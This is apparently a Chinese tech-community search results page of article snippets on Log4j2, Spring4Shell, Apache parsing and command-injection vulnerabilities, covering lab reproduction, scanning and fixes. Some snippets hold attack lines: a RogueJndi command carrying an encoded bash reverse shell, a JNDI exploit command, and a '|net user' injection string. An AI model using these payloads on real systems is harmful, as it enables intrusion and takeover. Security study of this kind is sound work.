首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏世荣的博客

    搭建漏洞环境-实战-4

    2.3 搭建DVWA漏洞环境 DVWA是一款开源的渗透测试漏洞练习平台,其中包含XSS,SQL注入,文件上传,文件包含,CSRF和暴力破解等各个难度的测试环境。 2.将DVWA重命名为dvwa并移动到htdocs Windows用户直接将文件拖到www即可(系统状态栏左下角) image.png 3.配置如上 注意:打开全局权限和用户账户数据库中的两个服务 4.

    64020编辑于 2022-03-18
  • 来自专栏网络信息安全

    漏洞复现】Apache Log4j 漏洞利用分析

    Apache Log4j 漏洞利用分析 Apache Log4j 项目被爆存在远程代码执行漏洞,且利用简单,影响危害巨大,光是引入了 log4j2 依赖的组件都是数不清,更别提项目本身可能存在的风险了 ,复现漏洞来学习一下,希望可以帮助到大家。 _221 三、 漏洞分析 测试代码如下: #log4j,java import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger log4j 中 jdni 的用法格式如下: ${jndi:JNDIContent} 既然明确了lookup是触发漏洞的点,并且找到了可以触发 lookup的方法 ,那么就可以找入口点,只要找到入口点,然后传入 ,其余的方法需要配置日志级别才可以触发漏洞

    1.1K10编辑于 2024-03-12
  • 走进“乌云”教科书书里的漏洞4)【充值舍入漏洞

    0x01 漏洞解析舍入漏洞是财务、支付、电商等涉及金额计算的系统中,因对小数金额的舍入规则设计不当或计算逻辑不统一,导致实际金额与预期金额产生偏差,进而被攻击者利用获取非法利益的业务逻辑漏洞。 其核心成因是不同系统模块(如订单计算、支付对账、退款结算)采用不一致的舍入方式,或未对舍入后的金额进行二次校验,形成金额差漏洞。 100 元订单拆分为 100 笔 1 元订单),利用每笔订单舍入产生的 0.01 元差额,通过批量操作获取非法收益;或在退款场景中,利用舍入差异使实际退款金额高于原支付金额,实现 “薅羊毛”0x02 漏洞复现本次使用靶场连接 在数据包里有提示:输入0.018,成功获取flag0x03 漏洞修复方法修复需围绕 “后端主导校验、拒绝信任前端数据” 核心原则,从数据校验、逻辑设计、监控审计三方面入手:后端强制重算金额:后端接收订单请求后

    43610编辑于 2025-08-25
  • 来自专栏FreeBuf

    企业漏洞管理的4大误区

    但是,企业可以采取很多措施来降低风险,特别是在漏洞管理方面。 漏洞管理的重要性通常被低估或忽视。我们来看看有哪些常见的漏洞管理认知误区并且来揭穿它们。 幸运的是,新的漏洞管理解决方案可以在不影响网络性能的情况下更快,使大规模扫描变得更快、更容易,因此,企业没有充分的理由偷懒。 误区2:漏洞=修补 许多人将漏洞等同于修补。 仅仅思考补丁是短视的,全面了解漏洞管理才能为组织提供更好的安全服务。 误区三:修复严重漏洞就能确保安全 组织必须首先解决5级严重漏洞的这一观点已经过时。 要么需要采用新的考虑因素和排名系统来解决漏洞,要么应该选择双管齐下的策略,利用自动化的漏洞管理解决方案立即修复较低级别的漏洞,同时释放团队成员来同时修复较高级别的漏洞。 误解四:漏洞管理没什么大不了的 这一观点显然缺乏对漏洞管理的重视。

    1.2K20发布于 2020-04-14
  • 来自专栏程序员升级之路

    Apache Log4j漏洞修复

    一、如何确定是否中招或已经修复 import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; "+cmdMessage ); logger.error("log4j2testerror"+cmdMessage ); logger.warn("log4j2testwarn <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-slf4j-impl</artifactId> </exclusion> </exclusions> </dependency> 项目中用的比较多的是下面几个包: log4j-api log4j-core log4j-jul log4j-slf4j-impl > <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-slf4j-impl<

    1.6K20编辑于 2021-12-13
  • 来自专栏R0A1NG 技术分享

    Log4j2漏洞复现

    原理 由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限 靶机:http://192.168.223.129:8080/ 靶机搭建: 1.平台环境 http://vulfocus.fofa.so/ 2.本地搭建 docker pull vulfocus/log4j2 -rce-2021-12-09:latest docker run -d -p 8080:8080 vulfocus/log4j2-rce-2021-12-09:latest 复现过程 先用dnslog 设置jvm参数"-Dlog4j2.formatMsgNoLookups=true"; 3. 设置系统环境变量"FORMAT_MESSAGES_PATTERN_DIS-ABLE_LOOKU_PS"为"true" 4. 关闭应用的网络外连。

    2.2K30编辑于 2022-02-19
  • 来自专栏Khan安全团队

    Unifi Log4jshell漏洞利用

    介绍 到现在为止,您可能已经很清楚最近披露的 Java 日志库 Log4j 的一个漏洞。该漏洞影响广泛,影响开源项目和企业软件。 Ubiquiti 在漏洞发布后不久宣布,他们的一些产品受到影响。 Sprocket 使用 Twitter 发布了使用 Log4j 在易受攻击的 Unifi 网络应用程序安装上实现远程代码执行的概念证明。 一旦您确定了一个易受攻击的实例,就可以轻松地进行漏洞利用。 中构建您的命令: java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTkyLjE2OC4xMS41MC80NDQ0IDA 据我所知,这个 Log4j 漏洞有可能产生重大影响。为什么?

    3.3K10编辑于 2022-01-05
  • 来自专栏FreeBuf

    如何使用Spring4Shell-Scan扫描Spring4Shell漏洞和Spring Cloud RCE漏洞

    关于Spring4Shell-Scan Spring4Shell-Scan是一款功能强大的Spring4Shell漏洞扫描工具,该工具能够熟悉漏洞的自动化扫描,并且稳定性强,准确率高。 在该工具的帮助下,广大研究人员可以轻松扫描和识别出Spring4Shell漏洞(CVE-2022-22965)和Spring Cloud远程代码执行漏洞(CVE-2022-22963)。 功能介绍 1、支持URL列表作为扫描输入; 2、支持使用超过十种全新的Spring4Shell Payload作为模糊测试用例; 3、支持对HTTP GET和POST方法执行模糊测试; 4、自动验证已发现漏洞的有效性 或全部,默认为全部 --test-CVE-2022-22963 测试CVE-2022-22963(Spring Cloud 远程代码执行漏洞 spring4shell-scan.py -l urls.txt 扫描Spring Cloud远程代码执行漏洞(CVE-2022-22963) $ python3 spring4shell-scan.py

    1.5K20编辑于 2022-06-08
  • 来自专栏渗透测试专栏

    渗透测试文件上传漏洞原理与验证(4)——Apache文件解析漏洞

    Apache 文件解析介绍Apache文件解析漏洞与用户的配置有密切关系。严格来说,属于用户配置问题,这里要讲解配置出错的原因以及修复方法,所以需要准备漏洞复现环境。使用ubuntu的docker。 |t|tml)$也就是说(php|php3|php4|php5|php7|pht|phtml)是文件的最后一个后缀,则把文件交给php处理器(php_module)来处理,处理完之后结果返回给apache Apache 文件解析漏洞Apache文件解析漏洞涉及到一个解析文件的特性:Apache默认一个文件可以有多个以点分隔的后缀,当右边的后缀无法识别(不在mime.types内),则继续向左识别。 其实,apache本身根本不存在所谓的解析漏洞我们回顾一下请求的过程:当我们请求这样一个文件:shel.php.xxx.yyyyyy->无法识别,向左xxx->无法识别,向左php->发现后缀是php, 交给php处理这个文件最后一步虽然交给了php来处理这个文件,但是php也不认识.aaa的后缀啊,所以就直接输出了其实,解析漏洞的产生,是由于运维人员在配置服务器时,为了使apache服务器能解析php

    1K20编辑于 2024-11-26
  • 来自专栏tongyao

    log4j2的漏洞修复

    log4j2的漏洞修复 简介 Log4j是Apache的一个开源项目,通过使用Log4j,可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog Apache Log4j2是Log4j的升级版本,该版本与之前的log4j1.x相比带来了显著的性能提升,并且修复一些存在于Logback中固有的问题的同时提供了很多在Logback中可用的性能提升,Apache 漏洞评级和影响版本 Apache Log4j 远程代码执行漏洞 严重 影响的版本范围:Apache Log4j 2.x <= 2.14.1 jdk与log4j2的版本对应关系 Log4j2.12.1是支持 Java 7的最后2.x版本,Log4j2.3是支持Java 6的最后2.x版本,Log4j团队不再提供对Java 6或7的支持。 解决 升级Log4j版本为2.15.0以上即可解决。

    58020编辑于 2022-06-09
  • 来自专栏安全漏洞环境学习

    Android4 漏洞环境简单挑战

    ef:6b (DSA) MAC Address: 00:0C:29:6F:D3:B3 (VMware) Device type: general purpose Running: Linux 3.X|4. X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network

    1.8K10发布于 2019-09-24
  • 来自专栏zaking's

    黑客玩具入门——4漏洞扫描与Metasploit

    searchsploit -p 3389:搜索漏洞号为3389的漏洞。 searchsploit mysql:查找mysql的漏洞。 searchsploit apple:查找apple的漏洞。 我们可以在Kali系统中找到该软件: 点击之后输入系统root密码,等待一会后,就变成这样了: 4、Metasploit:端口扫描 实验靶机:metasploitable2。 11、Wmap网站漏洞扫描 Wmap本身不是一个独立的漏洞扫描器,而是作为Metasploit的一个模块。结合Web漏洞和Web服务相关的模块协同工作,完成目标服务器的扫描任务。 4、远程控制安卓手机,上传下载文件 我们先来学下文件系统命令: cat,读取并输出到标准输出。 cd,更改目录。 checksum,检索文件的校验和。 cp,将源文件复制到目标文件夹。 4.打开Metasploit。输入这样的命令:resource /home/(你的用户名)/windows_control。   5.脚本就运行了。   6.然后直接run。   

    4.6K11编辑于 2023-12-01
  • 来自专栏Bypass

    Log4j2 漏洞实战案例

    在现在以及未来的一段时间里,Log4j2 漏洞依然是渗透和排查的重点。在测试靶场里复现多次,在实战中遇到还是十分兴奋,So,总得记录点什么吧。 ---- 01、漏洞发现 通过burp插件的方式,将Log4j2漏洞检测能力集成到burp进行被动扫描。在访问网站抓包的过程中,检测到目标站点存在Log4j2 RCE漏洞。 02、确认漏洞参数 由于使用参数Fuzz,每个数据包里都夹带多个参数注入Payload,我们需要进一步定位到具体的漏洞参数位置。 (1)登录ceye.io,可以查看当前的dnslog。 (2)对比burp参数注入的payload和dnslog请求,可初步确认参数username存在Log4j2 RCE漏洞。 jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "编码后的bash反弹shell命令" -A “监听的IP地址” 04、获取目标权限 利用Log4j2

    1.3K30编辑于 2022-04-19
  • 来自专栏余生大大

    log4j代码注入漏洞复现

    1.简介 前些天log4j官方宣布的log4j的漏洞闹得沸沸扬扬,各个公司加班升级修复,我们也在周末要求验证版本保证不受影响,既然知道了漏洞,我们就复现一下,比如让被注入文件的电脑关个机 2.工具准备 https://download.csdn.net/download/AnNanDu/64752930 里面包含2份源代码,两个工具类 log4j-exp:执行被注入代码的客户端服务 web-goodskill java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8081/#Log4jTest 1389  启动完成后第二步就完成了 3. log4j2执行注入 IDEA打开log4j-exp找到 log4jRCE 类,执行main方法  执行结果:  上面那行输出文字是我们的注入代码里写的输出

    72880编辑于 2022-11-02
  • 来自专栏渗透测试专栏

    渗透测试命令执行漏洞原理与验证(4)——命令执行漏洞及防御

    Command Injection-High黑名单看似过滤了所有的非法字符,但是把" | "(空格在后)替换为空字符,于是 可以用" | "(空格在前)绕过127.0.0.1 |net user命令执行漏洞防御尽量不要执行外部命令使用自定义函数或函数库来替代外部命令的功能使用

    47810编辑于 2024-11-17
  • 来自专栏FreeBuf

    如何使用Spring4Shell-POC测试Spring4Shell漏洞

    关于Spring4Shell-POC Spring4Shell-POC是一个Docker容器化的应用程序,这个应用程序中故意设计为包含了Spring4Shell漏洞(CVE-2022-22965) 生成的WAR文件需要在Tomcat中加载,加载完成后即可进行Spring4Shell漏洞的研究、分析和测试了。 漏洞原理 1、利用Spring的对象绑定功能将HTTP请求中的参数绑定到应用程序正在使用的某个对象中。 4、利用此漏洞,攻击者可以覆写Tomcat日志配置进而上传JSP web shell。 ://localhost:8080/helloworld/greeting 工具使用 下列命令将运行项目的exploit.py脚本来测试目标站点的Spring4Shell漏洞: python exploit.py

    98810编辑于 2022-06-08
  • 来自专栏WalkingCloud

    Elasticsearch Log4j漏洞快速修复步骤

    一、Elasticsearch关于Log4j2漏洞的官方说明 可以参考如下链接 https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve -2021-44228-esa-2021-31/291476 (图片可点击放大查看) 摘要:2021年12月9日,Log4j的GitHub公开披露了一个影响Apache Log4j2多个版本的高严重性漏洞 (CVE-2021-44228) 该漏洞影响了Apache Log4j2的2.0到2.14.1版本。 由于我们使用了Java安全管理器,Elasticsearch不易受此漏洞的远程代码执行影响,但是很快我们将提供Elasticsearch 6.8.21和7.16.1,这将删除易受攻击的Log4j组件并设置下面标识的 这些版本没有升级 Log4j 包,而是通过设置JVM 选项来缓解漏洞 -Dlog4j2.formatMsgNoLookups=true 并从 Log4j 包中删除易受攻击的 JndiLookup 类。

    11.7K30编辑于 2021-12-15
  • 来自专栏TA码字

    Log4j2 RCE 漏洞之续集

    经过一周时间的 log4j2 RCE 事件的发酵,事情也变也越来越复杂和有趣,就连 log4j 官方紧急发布了 2.15.0 版本之后没有过多久,又发声明说 2.15.0 版本也没有完全解决问题,然后进而继续发布了 大名鼎鼎的 spring boot,有几个 java 应用没有使用这个框架呢,下面展示了内置 tomcat 服务器中的这些类: 下面来介绍如何利用这两个类触发 log4j 的 RCE漏洞和原理,RMI Log4j2 2.15.0 的隐患是什么 官网已经明确说明 2.15.0 版本有问题,那么隐患是什么呢? Log4j1 就可以幸免于难么 有的讨论说 log4j1 版本就可以避免这个问题的发生,但是事实真的是这样么? 目前先我们写到这里,这个漏洞自打暴露以来网络上有各种各种的讨论和方案,但是最终要的是不盲从,不跟风,不人云亦云。问题确实严重,我们需要的是实实在在分析,找到根本原因。

    89910编辑于 2021-12-24
  • 来自专栏乌鸦安全

    Log4J漏洞本地快速复现

    01参 考 资 料 本复现大量参考: https://github.com/Yihsiwei/Log4j-exp 本次复现仅仅帮助他人本地复现漏洞。 在网上已经有很多人复现漏洞,但是对于不会java的童鞋,又想研究后续命令执行上线的童鞋来说,无疑是非常困难的,于是对比了几个版本之后,在这里对于本地漏洞复现做一个文字记录。 请大家严格遵守《漏洞管理条例》和《网络安全法》 02本地复现步骤 复现环境: windows10 + 1.8.0_172 + idea2018社区版 idea2018社区版直接去下面的链接下载就行了,非常方便 替换成功之后,按照如下进行build: 继续build 然后在刚才的目录下会生成一个out的文件夹: 点进去会找到一个Log4j-rce.jar文件。 对了,上述参考的资料中up主还提供了视频教程: https://www.bilibili.com/video/BV1iL4y1H7ax/

    7.2K150编辑于 2021-12-13
  • 来自专栏CSDN

    log4j2漏洞复现及修复

    log4j2漏洞复现及修复 1.漏洞复现 搭建简单maven项目,编写测试方法类:LoggerTest.java import org.apache.logging.log4j.LogManager; 、log4j-core 为 2.15.0 后测试结果: 情景三 搭建springboot项目引入log4j-core.2.11.1.jar 版本测试结果: 结果未出现log4j2漏洞问题 的前提下,依然不曾检测到漏洞问题,回到项目中,项目ei-crm-admin也是logback日志输出的项目,且测试方法在项目中也未测出漏洞反应,测试结果如下图: 3.结论 1.项目中同时引入log4j-api log4j-core,此时升级参考上一条 3.springboot项目即使引入有问题log4j-core版本的jar包也无法出现漏洞反应,而项目中logback和log4j2只能选一存在,springboot 5.kafka (1).测试环境kafka通过命令查看是否引入log4j2 jar包 kafka版本较低,无log4j-core jar包,log4j-api jar包版本不在漏洞版本范围内;

    99610编辑于 2024-03-29
领券